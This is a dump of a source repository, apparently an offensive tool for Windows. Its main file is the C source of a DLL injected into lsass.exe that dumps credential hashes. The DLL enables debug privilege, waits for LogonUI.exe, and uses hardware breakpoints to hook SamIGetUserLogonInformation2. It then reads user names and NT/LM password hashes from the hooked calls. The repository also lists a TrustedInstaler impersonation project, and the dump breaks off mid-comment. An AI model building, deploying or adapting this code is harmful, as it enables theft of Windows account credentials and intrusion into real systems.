├── DumpHashes ├── DllMain.c ├── DumpHashes.vcxproj ├── DumpHashes.vcxproj.filters ├── DumpHashes.vcxproj.user ├── HardwareBreakingLib.c ├── HardwareBreakingLib.h ├── Log.c ├── Log.h ├── LsasrvExports.h ├── Source.def └── Structs.h ├── ImpersonateTrustedInstaler.sln ├── ImpersonateTrustedInstaler ├── ImpersonateTrustedInstaler.vcxproj ├── ImpersonateTrustedInstaler.vcxproj.filters ├── ImpersonateTrustedInstaler.vcxproj.user └── Main.c ├── LICENSE └── README.md /DumpHashes/DllMain.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include "HardwareBreakingLib.h" 6 | #include "LsasrvExports.h" 7 | #include "Log.h" 8 | 9 | 10 | // ====================================================================================================================================================== 11 | 12 | #ifndef NT_SUCCESS 13 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 14 | #endif 15 | 16 | // https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1203 17 | #define USER_ALL_USERID 0x00000004 18 | 19 | 20 | // ====================================================================================================================================================== 21 | 22 | #define HOOKED_DLL_NAME L"Samsrv.dll" 23 | #define DLL_WAIT_TIME_OUT 1000 * 05 // 5 seconds 24 | 25 | #define PROC_NAME_TO_MONITOR L"LogonUI.exe" 26 | #define PROC_WAIT_TIME_OUT 1000 * 60 * 1 // 1 minute 27 | 28 | #define FUNCTION_TO_HOOK "SamIGetUserLogonInformation2" 29 | #define MONITORING_TIME_OUT 1000 * 60 * 1 // 1 minute 30 | 31 | // ====================================================================================================================================================== 32 | 33 | // \ 34 | #define PRINT_CTX 35 | 36 | //\ 37 | #define CREDENTIALS_THROUGH_RSP 38 | 39 | // 
====================================================================================================================================================== 40 | 41 | typedef struct _UNICODE_STRING { 42 | USHORT Length; 43 | USHORT MaximumLength; 44 | PWSTR Buffer; 45 | } UNICODE_STRING, * PUNICODE_STRING; 46 | 47 | 48 | // ====================================================================================================================================================== 49 | /* 50 | @ Global variables 51 | */ 52 | 53 | static HANDLE g_hFoundEvent = NULL; 54 | 55 | // ====================================================================================================================================================== 56 | 57 | /* 58 | @ Waits for a module to load 59 | */ 60 | HMODULE WaitForModuleToLoad(IN LPCWSTR szModuleName, IN DWORD dwTimeoutMs) { 61 | 62 | DWORD dwStart = GetTickCount64(); 63 | HMODULE hModule = NULL; 64 | 65 | while (TRUE) { 66 | 67 | if ((hModule = GetModuleHandleW(szModuleName))) 68 | return hModule; 69 | 70 | if (GetTickCount64() - dwStart > dwTimeoutMs) 71 | { 72 | DBGPRINTF(L"[!] WaitForModuleToLoad Timeout After %d ms\n", dwTimeoutMs); 73 | return NULL; 74 | } 75 | 76 | Sleep(50); 77 | 78 | } 79 | } 80 | 81 | // ====================================================================================================================================================== 82 | 83 | /* 84 | @ Fetches the PID of the LogonUI.exe process 85 | */ 86 | 87 | BOOL FetchLogonUIProcessID(OPTIONAL OUT DWORD* pdwLogonUIPid) { 88 | 89 | PROCESSENTRY32 ProcEntry = { .dwSize = sizeof(PROCESSENTRY32) }; 90 | HANDLE hSnapShot = INVALID_HANDLE_VALUE; 91 | BOOL bResults = FALSE; 92 | 93 | if ((hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL)) == INVALID_HANDLE_VALUE) { 94 | DBGPRINTF(L"[!] CreateToolhelp32Snapshot Failed With Error: %d \n", GetLastError()); 95 | return FALSE; 96 | } 97 | 98 | if (!Process32First(hSnapShot, &ProcEntry)) { 99 | DBGPRINTF(L"[!] 
Process32First Failed With Error: %d \n", GetLastError()); 100 | goto _END_OF_FUNC; 101 | } 102 | 103 | do { 104 | 105 | if (_wcsicmp(ProcEntry.szExeFile, PROC_NAME_TO_MONITOR) == 0x00) 106 | { 107 | if (pdwLogonUIPid) 108 | *pdwLogonUIPid = ProcEntry.th32ProcessID; 109 | 110 | bResults = TRUE; 111 | break; 112 | } 113 | 114 | } while (Process32Next(hSnapShot, &ProcEntry)); 115 | 116 | 117 | _END_OF_FUNC: 118 | if (hSnapShot != INVALID_HANDLE_VALUE) 119 | CloseHandle(hSnapShot); 120 | return bResults; 121 | } 122 | 123 | // ====================================================================================================================================================== 124 | 125 | /* 126 | @ Waits for the LogonUI.exe process to start 127 | */ 128 | BOOL MonitorLogonUIProcess() { 129 | 130 | while (TRUE) 131 | { 132 | DWORD dwLogonUIPid = 0x00; 133 | 134 | if (FetchLogonUIProcessID(&dwLogonUIPid)) 135 | { 136 | if (dwLogonUIPid) 137 | { 138 | DBGPRINTF(L"[i] Found LogonUI.exe PID: %d\n", dwLogonUIPid); 139 | SetEvent(g_hFoundEvent); 140 | return TRUE; 141 | } 142 | } 143 | 144 | Sleep(100); 145 | } 146 | 147 | return FALSE; 148 | } 149 | 150 | // ====================================================================================================================================================== 151 | 152 | 153 | VOID WriteHexUnicode(IN LPCWSTR szName, IN PBYTE pBuffer, IN DWORD dwBufferLength, IN BOOL bQueryMemAccess) { 154 | 155 | DWORD dwIndex = 0x00; 156 | 157 | DBGPRINTF(L"[*] %s Hex Unicode Dump:\n", szName); 158 | DBGPRINTF(L"[*] Address\t\tHex\t\tUnicode\n"); 159 | DBGPRINTF(L"[*] ----------------------------------------\n"); 160 | 161 | if (!pBuffer || dwBufferLength == 0x00) 162 | { 163 | DBGPRINTF(L"[*] 0x%08X\t\t(null)\t\t(null)\n", dwIndex); 164 | return; 165 | } 166 | 167 | if (bQueryMemAccess) 168 | { 169 | MEMORY_BASIC_INFORMATION MemBasicInfo = { 0 }; 170 | 171 | __try 172 | { 173 | VirtualQuery(pBuffer, &MemBasicInfo, 
sizeof(MEMORY_BASIC_INFORMATION)); 174 | } 175 | __except (EXCEPTION_EXECUTE_HANDLER) 176 | { 177 | DBGPRINTF(L"[!] VirtualQuery Failed With Error: %d\n", GetLastError()); 178 | } 179 | 180 | if (MemBasicInfo.Protect & PAGE_GUARD) 181 | { 182 | DBGPRINTF(L"[i] Memory Guard Page Detected: [ 0x%p ] ... [ 0x%08X ]\n", MemBasicInfo.BaseAddress, MemBasicInfo.RegionSize); 183 | return; 184 | } 185 | 186 | if (MemBasicInfo.Protect & PAGE_NOACCESS) 187 | { 188 | DBGPRINTF(L"[!] Memory No Access Detected: [ 0x%p ] ... [ 0x%08X ]\n", MemBasicInfo.BaseAddress, MemBasicInfo.RegionSize); 189 | return; 190 | } 191 | } 192 | 193 | __try 194 | { 195 | for (dwIndex = 0x00; dwIndex < dwBufferLength; dwIndex++) { 196 | if ((dwIndex % 8) == 0) { 197 | DBGPRINTF(L"[*] 0x%08X\t", dwIndex); 198 | } 199 | DBGPRINTF(L"%04X ", ((WCHAR*)pBuffer)[dwIndex]); 200 | if ((dwIndex % 8) == 7) { 201 | DBGPRINTF(L"\t"); 202 | for (DWORD i = dwIndex - 7; i <= dwIndex; i++) { 203 | if (((WCHAR*)pBuffer)[i] >= 0x20 && ((WCHAR*)pBuffer)[i] <= 0x7E) { 204 | DBGPRINTF(L"%c", ((WCHAR*)pBuffer)[i]); 205 | } 206 | else { 207 | DBGPRINTF(L"."); 208 | } 209 | } 210 | DBGPRINTF(L"\n"); 211 | } 212 | } 213 | 214 | if ((dwIndex % 8) != 0) { 215 | DBGPRINTF(L"\n"); 216 | } 217 | } 218 | __except (EXCEPTION_EXECUTE_HANDLER) 219 | { 220 | DWORD dwExceptionCode = GetExceptionCode(); 221 | 222 | switch (dwExceptionCode) { 223 | 224 | /* 225 | case EXCEPTION_ACCESS_VIOLATION: 226 | DBGPRINTF(L"[!] Access Violation Exception: Invalid/Uncommented Memory Access\n"); 227 | break; 228 | 229 | case STATUS_GUARD_PAGE_VIOLATION: 230 | DBGPRINTF(L"[!] Guard Page Violation Exception: Protected Memory Access\n"); 231 | break; 232 | */ 233 | 234 | default: 235 | // DBGPRINTF(L"[!] 
Exception Occurred While Dumping Memory: 0x%08X\n", dwExceptionCode); 236 | break; 237 | } 238 | 239 | return; 240 | } 241 | } 242 | 243 | // ====================================================================================================================================================== 244 | 245 | VOID PrintpUnicodeStringProtected(IN ULONG_PTR uAdress) 246 | { 247 | PUNICODE_STRING uPossibleCredentials = NULL; 248 | 249 | __try 250 | { 251 | uPossibleCredentials = (UNICODE_STRING*)uAdress; 252 | } 253 | __except (EXCEPTION_EXECUTE_HANDLER) 254 | { 255 | // DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode()); 256 | } 257 | 258 | __try 259 | { 260 | if (uPossibleCredentials->Buffer) 261 | { 262 | if (uPossibleCredentials->Length <= uPossibleCredentials->MaximumLength) 263 | DBGPRINTF(L"[*] Possible Credentials Found: %s\n", uPossibleCredentials->Buffer); 264 | else 265 | WriteHexUnicode(L"Possible Credentials Found", (PBYTE)uPossibleCredentials->Buffer, uPossibleCredentials->Length, FALSE); 266 | } 267 | else 268 | { 269 | DBGPRINTF(L"[!] Invalid PUNICODE_STRING Buffer: [ %p ]\n", uPossibleCredentials); 270 | } 271 | } 272 | __except (EXCEPTION_EXECUTE_HANDLER) 273 | { 274 | // DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode()); 275 | } 276 | } 277 | 278 | 279 | // ====================================================================================================================================================== 280 | 281 | 282 | #ifdef PRINT_CTX 283 | 284 | static volatile LONG64 g_PrintedCtxCount = 0x00; 285 | 286 | VOID PrintAddrPntrProtected(IN LPCWSTR szAddrName, IN ULONG_PTR uAddress) 287 | { 288 | __try 289 | { 290 | DBGPRINTF(L"[i] %s: 0x%p\n", szAddrName, (PVOID)(*(ULONG_PTR*)uAddress)); 291 | } 292 | __except (EXCEPTION_EXECUTE_HANDLER) 293 | { 294 | // DBGPRINTF(L"[!] 
Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode()); 295 | } 296 | 297 | } 298 | 299 | VOID PrintThreadContext(IN PCONTEXT pThreadCtx) 300 | { 301 | 302 | DBGPRINTF(L"[i] Thread Context [ #%I64d ]:\n", InterlockedIncrement64(&g_PrintedCtxCount)); 303 | 304 | DBGPRINTF(L"[i] Rax: 0x%p\n", pThreadCtx->Rax); 305 | DBGPRINTF(L"[i] Rcx: 0x%p\n", pThreadCtx->Rcx); 306 | DBGPRINTF(L"[i] Rdx: 0x%p\n", pThreadCtx->Rdx); 307 | DBGPRINTF(L"[i] Rsi: 0x%p\n", pThreadCtx->Rsi); 308 | DBGPRINTF(L"[i] R8: 0x%p\n", pThreadCtx->R8); 309 | DBGPRINTF(L"[i] R9: 0x%p\n", pThreadCtx->R9); 310 | 311 | for (int i = 5; i < 9; i++) 312 | { 313 | WCHAR szRspOffset[32] = { 0 }; 314 | swprintf_s(szRspOffset, _countof(szRspOffset), L"Rsp + 0x%02X", (unsigned int)(i * sizeof(PVOID))); 315 | PrintAddrPntrProtected(szRspOffset, pThreadCtx->Rsp + i * sizeof(PVOID)); 316 | } 317 | 318 | 319 | DBGPRINTF(L"[i] Rip: 0x%p\n", pThreadCtx->Rip); 320 | DBGPRINTF(L"[i] Rbp: 0x%p\n", pThreadCtx->Rbp); 321 | DBGPRINTF(L"[i] Rdi: 0x%p\n", pThreadCtx->Rdi); 322 | DBGPRINTF(L"[i] Rbx: 0x%p\n", pThreadCtx->Rbx); 323 | DBGPRINTF(L"[i] R10: 0x%p\n", pThreadCtx->R10); 324 | DBGPRINTF(L"[i] R11: 0x%p\n", pThreadCtx->R11); 325 | DBGPRINTF(L"[i] R12: 0x%p\n", pThreadCtx->R12); 326 | DBGPRINTF(L"[i] R13: 0x%p\n", pThreadCtx->R13); 327 | DBGPRINTF(L"[i] R14: 0x%p\n", pThreadCtx->R14); 328 | DBGPRINTF(L"[i] R15: 0x%p\n", pThreadCtx->R15); 329 | 330 | /* 331 | DBGPRINTF(L"[i] SegCs: 0x%p\n", pThreadCtx->SegCs); 332 | DBGPRINTF(L"[i] SegDs: 0x%p\n", pThreadCtx->SegDs); 333 | DBGPRINTF(L"[i] SegEs: 0x%p\n", pThreadCtx->SegEs); 334 | DBGPRINTF(L"[i] SegFs: 0x%p\n", pThreadCtx->SegFs); 335 | DBGPRINTF(L"[i] SegGs: 0x%p\n", pThreadCtx->SegGs); 336 | DBGPRINTF(L"[i] SegSs: 0x%p\n", pThreadCtx->SegSs); 337 | DBGPRINTF(L"[i] EFlags: 0x%p\n", pThreadCtx->EFlags); 338 | DBGPRINTF(L"[i] Dr0: 0x%p\n", pThreadCtx->Dr0); 339 | DBGPRINTF(L"[i] Dr1: 0x%p\n", pThreadCtx->Dr1); 340 | DBGPRINTF(L"[i] Dr2: 0x%p\n", 
pThreadCtx->Dr2); 341 | DBGPRINTF(L"[i] Dr3: 0x%p\n", pThreadCtx->Dr3); 342 | DBGPRINTF(L"[i] Dr6: 0x%p\n", pThreadCtx->Dr6); 343 | DBGPRINTF(L"[i] Dr7: 0x%p\n", pThreadCtx->Dr7); 344 | DBGPRINTF(L"[i] ContextFlags: 0x%p\n", pThreadCtx->ContextFlags); 345 | DBGPRINTF(L"[i] MxCsr: 0x%p\n", pThreadCtx->MxCsr); 346 | DBGPRINTF(L"[i] VectorControl: 0x%p\n", pThreadCtx->VectorControl); 347 | DBGPRINTF(L"[i] DebugControl: 0x%p\n", pThreadCtx->DebugControl); 348 | DBGPRINTF(L"[i] LastExceptionToRip: 0x%p\n", pThreadCtx->LastExceptionToRip); 349 | DBGPRINTF(L"[i] LastExceptionFromRip: 0x%p\n", pThreadCtx->LastExceptionFromRip); 350 | DBGPRINTF(L"[i] LastBranchToRip: 0x%p\n", pThreadCtx->LastBranchToRip); 351 | DBGPRINTF(L"[i] LastBranchFromRip: 0x%p\n", pThreadCtx->LastBranchFromRip); 352 | */ 353 | 354 | } 355 | 356 | #endif // PRINT_CTX 357 | 358 | // ====================================================================================================================================================== 359 | 360 | 361 | #ifdef CREDENTIALS_THROUGH_RSP 362 | 363 | typedef struct _LOGON_HOURS 364 | { 365 | USHORT UnitsPerWeek; 366 | PUCHAR LogonHours; 367 | } LOGON_HOURS, * PLOGON_HOURS; 368 | 369 | typedef struct _SR_SECURITY_DESCRIPTOR 370 | { 371 | ULONG Length; 372 | PUCHAR SecurityDescriptor; 373 | } SR_SECURITY_DESCRIPTOR, * PSR_SECURITY_DESCRIPTOR; 374 | 375 | typedef struct _USER_ALL_INFORMATION 376 | { 377 | LARGE_INTEGER LastLogon; 378 | LARGE_INTEGER LastLogoff; 379 | LARGE_INTEGER PasswordLastSet; 380 | LARGE_INTEGER AccountExpires; 381 | LARGE_INTEGER PasswordCanChange; 382 | LARGE_INTEGER PasswordMustChange; 383 | UNICODE_STRING UserName; 384 | UNICODE_STRING FullName; 385 | UNICODE_STRING HomeDirectory; 386 | UNICODE_STRING HomeDirectoryDrive; 387 | UNICODE_STRING ScriptPath; 388 | UNICODE_STRING ProfilePath; 389 | UNICODE_STRING AdminComment; 390 | UNICODE_STRING WorkStations; 391 | UNICODE_STRING UserComment; 392 | UNICODE_STRING Parameters; 393 | 
UNICODE_STRING LmPassword; 394 | UNICODE_STRING NtPassword; 395 | UNICODE_STRING PrivateData; 396 | SR_SECURITY_DESCRIPTOR SecurityDescriptor; 397 | ULONG UserId; 398 | ULONG PrimaryGroupId; 399 | ULONG UserAccountControl; 400 | ULONG WhichFields; 401 | LOGON_HOURS LogonHours; 402 | USHORT BadPasswordCount; 403 | USHORT LogonCount; 404 | USHORT CountryCode; 405 | USHORT CodePage; 406 | BOOLEAN LmPasswordPresent; 407 | BOOLEAN NtPasswordPresent; 408 | BOOLEAN PasswordExpired; 409 | BOOLEAN PrivateDataSensitive; 410 | } USER_ALL_INFORMATION, * PUSER_ALL_INFORMATION; 411 | 412 | typedef struct _USER_ALLOWED_TO_DELEGATE_TO_LIST 413 | { 414 | ULONG Size; 415 | ULONG NumSPNs; 416 | UNICODE_STRING SPNList[ANYSIZE_ARRAY]; 417 | } USER_ALLOWED_TO_DELEGATE_TO_LIST, * PUSER_ALLOWED_TO_DELEGATE_TO_LIST; 418 | 419 | typedef struct _USER_INTERNAL6_INFORMATION 420 | { 421 | USER_ALL_INFORMATION I1; 422 | LARGE_INTEGER LastBadPasswordTime; 423 | ULONG ExtendedFields; 424 | BOOLEAN UPNDefaulted; 425 | UNICODE_STRING UPN; 426 | PUSER_ALLOWED_TO_DELEGATE_TO_LIST A2D2List; 427 | } USER_INTERNAL6_INFORMATION, * PUSER_INTERNAL6_INFORMATION; 428 | 429 | // ====================================================================================================================================================== 430 | 431 | static PVOID volatile g_pInfo = NULL; 432 | 433 | // ====================================================================================================================================================== 434 | 435 | VOID FunctionDetour(IN PCONTEXT pThreadCtx) 436 | { 437 | 438 | #ifdef PRINT_CTX 439 | 440 | DBGPRINTF(L"================================================================================\n"); 441 | PrintThreadContext(pThreadCtx); 442 | 443 | #else 444 | 445 | DBGPRINTF(L"[i] %hs's Detour Executed\n", FUNCTION_TO_HOOK); 446 | 447 | if (pThreadCtx->R9 == USER_ALL_USERID) 448 | { 449 | if (pThreadCtx->Rdx == 0x4000 && pThreadCtx->Rsi == 0x4000) 450 | { 451 | 
DBGPRINTF(L"[i] Attempting To Fetch Credentials:\n"); 452 | 453 | PUSER_INTERNAL6_INFORMATION pInfo = NULL; 454 | 455 | __try 456 | { 457 | pInfo = *(PUSER_INTERNAL6_INFORMATION*)(pThreadCtx->Rsp + 0x38); 458 | InterlockedExchangePointer(&g_pInfo, pInfo); 459 | 460 | DBGPRINTF(L"[i] [RSP + 0x38]: 0x%p\n", (PVOID)pInfo); 461 | } 462 | __except (EXCEPTION_EXECUTE_HANDLER) 463 | { 464 | DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode()); 465 | } 466 | 467 | } 468 | } 469 | 470 | if (InterlockedCompareExchangePointer(&g_pInfo, NULL, NULL)) 471 | { 472 | PUSER_INTERNAL6_INFORMATION pInfo = InterlockedCompareExchangePointer(&g_pInfo, NULL, NULL); 473 | 474 | __try 475 | { 476 | PrintpUnicodeStringProtected(&pInfo->I1.UserName); 477 | } 478 | __except (EXCEPTION_EXECUTE_HANDLER) 479 | { 480 | DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode()); 481 | } 482 | 483 | __try 484 | { 485 | PrintpUnicodeStringProtected(&pInfo->I1.FullName); 486 | } 487 | __except (EXCEPTION_EXECUTE_HANDLER) 488 | { 489 | DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode()); 490 | } 491 | 492 | __try 493 | { 494 | PrintpUnicodeStringProtected(&pInfo->I1.NtPassword); 495 | } 496 | __except (EXCEPTION_EXECUTE_HANDLER) 497 | { 498 | DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode()); 499 | } 500 | 501 | __try 502 | { 503 | PrintpUnicodeStringProtected(&pInfo->I1.LmPassword); 504 | } 505 | __except (EXCEPTION_EXECUTE_HANDLER) 506 | { 507 | DBGPRINTF(L"[!] Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode()); 508 | } 509 | 510 | __try 511 | { 512 | PrintpUnicodeStringProtected(&pInfo->I1.PrivateData); 513 | } 514 | __except (EXCEPTION_EXECUTE_HANDLER) 515 | { 516 | DBGPRINTF(L"[!] 
Exception Occurred At Line %ld : 0x%08X\n", __LINE__, GetExceptionCode()); 517 | } 518 | 519 | InterlockedExchangePointer(&g_pInfo, NULL); 520 | } 521 | 522 | #endif // PRINT_CTX 523 | 524 | CONTINUE_EXECUTION(pThreadCtx); 525 | } 526 | 527 | // This works because SamIGetUserLogonInformation2 is nothing but a wrapper for Sam[p]GetUserLogonInformation 528 | // It has only one return instruction 529 | ULONG_PTR GetRetAddress(IN PBYTE pFunction) { 530 | 531 | for (int i = 0; i < 0x100; i++) 532 | { 533 | if (pFunction[i] == 0xC3) 534 | { 535 | return (ULONG)(pFunction + i); 536 | } 537 | } 538 | 539 | return NULL; 540 | } 541 | 542 | #else 543 | 544 | VOID FunctionDetour(IN PCONTEXT pThreadCtx) 545 | { 546 | 547 | #ifdef PRINT_CTX 548 | 549 | DBGPRINTF(L"================================================================================\n"); 550 | PrintThreadContext(pThreadCtx); 551 | 552 | #else 553 | 554 | DBGPRINTF(L"[i] %hs's Detour Executed\n", FUNCTION_TO_HOOK); 555 | 556 | if (pThreadCtx->R9 == USER_ALL_USERID) 557 | { 558 | if (pThreadCtx->Rdx == 0x4000 && pThreadCtx->Rsi == 0x4000) 559 | { 560 | DBGPRINTF(L"[i] Attempting To Fetch Credentials:\n"); 561 | 562 | for (int i = 0; i < 0x04; i++) 563 | { 564 | __try 565 | { 566 | PrintpUnicodeStringProtected((ULONG_PTR)(pThreadCtx->R8 + (i * sizeof(UNICODE_STRING)))); 567 | } 568 | __except (EXCEPTION_EXECUTE_HANDLER) 569 | { 570 | DBGPRINTF(L"[!] 
Exception Occurred At [ i:%d ] Line %ld : 0x%08X\n", i, __LINE__, GetExceptionCode()); 571 | } 572 | } 573 | } 574 | } 575 | 576 | #endif // PRINT_CTX 577 | 578 | CONTINUE_EXECUTION(pThreadCtx); 579 | } 580 | 581 | 582 | #endif // CREDENTIALS_THROUGH_RSP 583 | 584 | 585 | // ====================================================================================================================================================== 586 | 587 | BOOL SetDebugPrivilege() { 588 | 589 | BOOL bResult = FALSE; 590 | TOKEN_PRIVILEGES TokenPrivs = { 0 }; 591 | LUID Luid = { 0 }; 592 | HANDLE hCurrentTokenHandle = NULL; 593 | 594 | if (!OpenProcessToken((HANDLE)-1, TOKEN_ADJUST_PRIVILEGES, &hCurrentTokenHandle)) { 595 | DBGPRINTF(L"[!] OpenProcessToken Failed With Error: %d \n", GetLastError()); 596 | goto _END_OF_FUNC; 597 | } 598 | 599 | if (!LookupPrivilegeValueW(NULL, SE_DEBUG_NAME, &Luid)) { 600 | DBGPRINTF(L"[!] LookupPrivilegeValueW Failed With Error: %d \n", GetLastError()); 601 | goto _END_OF_FUNC; 602 | } 603 | 604 | TokenPrivs.PrivilegeCount = 0x01; 605 | TokenPrivs.Privileges[0].Luid = Luid; 606 | TokenPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 607 | 608 | if (!AdjustTokenPrivileges(hCurrentTokenHandle, FALSE, &TokenPrivs, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) { 609 | DBGPRINTF(L"[!] AdjustTokenPrivileges Failed With Error: %d \n", GetLastError()); 610 | goto _END_OF_FUNC; 611 | } 612 | 613 | if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) { 614 | DBGPRINTF(L"[!] 
Not All Privileges Referenced Are Assigned To The Caller \n"); 615 | goto _END_OF_FUNC; 616 | } 617 | 618 | bResult = TRUE; 619 | 620 | _END_OF_FUNC: 621 | if (hCurrentTokenHandle) 622 | CloseHandle(hCurrentTokenHandle); 623 | return bResult; 624 | } 625 | 626 | 627 | 628 | // ====================================================================================================================================================== 629 | 630 | BOOL ExecStart() { 631 | 632 | HMODULE hModule = NULL; 633 | HANDLE hMonitorThread = NULL; 634 | ULONG_PTR uFunction = NULL; 635 | ULONG_PTR uFunctionEnd = NULL; 636 | BOOL bHookingLibInit = FALSE, 637 | bResults = FALSE; 638 | WCHAR* szModuleName = HOOKED_DLL_NAME; 639 | CHAR* cFunctionName = FUNCTION_TO_HOOK; 640 | 641 | if (!(bHookingLibInit = InitHardwareBreakpointHooking())) { 642 | DBGPRINTF(L"[!] InitHardwareBreakpointHooking Failed\n"); 643 | goto _END_OF_FUNC; 644 | } 645 | 646 | // May be required to suspend some threads while setting the hardware breakpoint 647 | if (!SetDebugPrivilege()) 648 | { 649 | DBGPRINTF(L"[!] SetDebugPrivilege Failed\n"); 650 | } 651 | 652 | if (!(g_hFoundEvent = CreateEventW(NULL, FALSE, FALSE, NULL))) { 653 | DBGPRINTF(L"[!] CreateEvent Failed With Error: %d\n", GetLastError()); 654 | goto _END_OF_FUNC; 655 | } 656 | 657 | if (!(hModule = WaitForModuleToLoad(szModuleName, DLL_WAIT_TIME_OUT))) { 658 | DBGPRINTF(L"[!] WaitForModuleToLoad Failed For %s With Error: %d\n", szModuleName, GetLastError()); 659 | goto _END_OF_FUNC; 660 | } 661 | 662 | if (!(uFunction = (ULONG_PTR)GetProcAddress(hModule, cFunctionName))) { 663 | DBGPRINTF(L"[!] GetProcAddress Failed For %hs With Error: %d\n", cFunctionName, GetLastError()); 664 | goto _END_OF_FUNC; 665 | } 666 | 667 | DBGPRINTF(L"[i] Found %hs's Start Address: 0x%p\n", cFunctionName, uFunction); 668 | 669 | #ifdef CREDENTIALS_THROUGH_RSP 670 | if (!(uFunctionEnd = GetRetAddress((PBYTE)uFunction))) { 671 | DBGPRINTF(L"[!] 
GetRetAddress Failed\n"); 672 | goto _END_OF_FUNC; 673 | } 674 | 675 | DBGPRINTF(L"[i] Found %hs's End Address: 0x%p\n", cFunctionName, uFunctionEnd); 676 | #endif // CREDENTIALS_THROUGH_RSP 677 | 678 | 679 | if (!(hMonitorThread = CreateThread(NULL, 0x00, (LPTHREAD_START_ROUTINE)MonitorLogonUIProcess, NULL, 0x00, NULL))) { 680 | DBGPRINTF(L"[!] CreateThread Failed With Error: %d\n", GetLastError()); 681 | goto _END_OF_FUNC; 682 | } 683 | 684 | DBGPRINTF(L"[i] Waiting For %s To Load ...\n", PROC_NAME_TO_MONITOR); 685 | 686 | if (WaitForSingleObject(g_hFoundEvent, PROC_WAIT_TIME_OUT) != WAIT_OBJECT_0) 687 | { 688 | DBGPRINTF(L"[!] WaitForSingleObject Timeout After %d ms\n", PROC_WAIT_TIME_OUT); 689 | goto _END_OF_FUNC; 690 | } 691 | 692 | if (!InstallHardwareBreakingPntHook((PUINT_VAR_T)uFunction, Dr0, (PVOID)FunctionDetour, ALL_THREADS)) { 693 | DBGPRINTF(L"[!] InstallHardwareBreakingPntHook Failed (1)\n"); 694 | goto _END_OF_FUNC; 695 | } 696 | 697 | DBGPRINTF(L"[+] Hooked %hs's Start\n", cFunctionName); 698 | 699 | #ifdef CREDENTIALS_THROUGH_RSP 700 | 701 | if (!InstallHardwareBreakingPntHook((PUINT_VAR_T)uFunctionEnd, Dr1, (PVOID)FunctionDetour, ALL_THREADS)) { 702 | DBGPRINTF(L"[!] 
InstallHardwareBreakingPntHook Failed (2)\n"); 703 | goto _END_OF_FUNC; 704 | } 705 | 706 | DBGPRINTF(L"[+] Hooked %hs's End\n", cFunctionName); 707 | 708 | #endif // CREDENTIALS_THROUGH_RSP 709 | 710 | DBGPRINTF(L"[i] Monitering Function Call For [%d] ms ...\n", MONITORING_TIME_OUT); 711 | Sleep(MONITORING_TIME_OUT); 712 | 713 | DBGPRINTF(L"[#] Finished \n"); 714 | bResults = TRUE; 715 | 716 | _END_OF_FUNC: 717 | if (bHookingLibInit) 718 | CleapUpHardwareBreakpointHooking(); 719 | if (hMonitorThread) 720 | CloseHandle(hMonitorThread); 721 | if (g_hFoundEvent) 722 | CloseHandle(g_hFoundEvent); 723 | return bResults; 724 | } 725 | 726 | 727 | // ====================================================================================================================================================== 728 | 729 | #define ACTIVE_IMPLEMENTATION 730 | 731 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) { 732 | 733 | 734 | if (dwReason == DLL_PROCESS_ATTACH) 735 | { 736 | DBGPRINTF(L"\n\n--------------------------------------------------------------------------------------\n"); 737 | DBGPRINTF(L"[*] Hello From Lsass.exe: %d\n", GetCurrentProcessId()); 738 | 739 | #ifdef ACTIVE_IMPLEMENTATION 740 | DisableThreadLibraryCalls((HMODULE)hModule); 741 | CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ExecStart, NULL, 0x00, NULL); 742 | #endif 743 | 744 | } 745 | 746 | return TRUE; 747 | } 748 | 749 | 750 | // ====================================================================================================================================================== 751 | 752 | 753 | 754 | /* 755 | 756 | // @ https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1430 757 | typedef struct _USER_INTERNAL6_INFORMATION 758 | { 759 | USER_ALL_INFORMATION I1; 760 | LARGE_INTEGER LastBadPasswordTime; 761 | ULONG ExtendedFields; 762 | BOOLEAN UPNDefaulted; 763 | UNICODE_STRING UPN; 764 | PUSER_ALLOWED_TO_DELEGATE_TO_LIST A2D2List; 765 | } USER_INTERNAL6_INFORMATION, 
*PUSER_INTERNAL6_INFORMATION; 766 | 767 | 768 | 769 | // Elements in USER_ALL_INFORMATION are populated based on the USER_ALL_* flags: 770 | // @ https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1199 771 | 772 | 773 | // @ https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1340C1-L1375C48 774 | typedef struct _USER_ALL_INFORMATION 775 | { 776 | LARGE_INTEGER LastLogon; 777 | LARGE_INTEGER LastLogoff; 778 | LARGE_INTEGER PasswordLastSet; 779 | LARGE_INTEGER AccountExpires; 780 | LARGE_INTEGER PasswordCanChange; 781 | LARGE_INTEGER PasswordMustChange; 782 | UNICODE_STRING UserName; 783 | UNICODE_STRING FullName; 784 | UNICODE_STRING HomeDirectory; 785 | UNICODE_STRING HomeDirectoryDrive; 786 | UNICODE_STRING ScriptPath; 787 | UNICODE_STRING ProfilePath; 788 | UNICODE_STRING AdminComment; 789 | UNICODE_STRING WorkStations; 790 | UNICODE_STRING UserComment; 791 | UNICODE_STRING Parameters; 792 | UNICODE_STRING LmPassword; 793 | UNICODE_STRING NtPassword; 794 | UNICODE_STRING PrivateData; 795 | SR_SECURITY_DESCRIPTOR SecurityDescriptor; 796 | ULONG UserId; 797 | ULONG PrimaryGroupId; 798 | ULONG UserAccountControl; 799 | ULONG WhichFields; 800 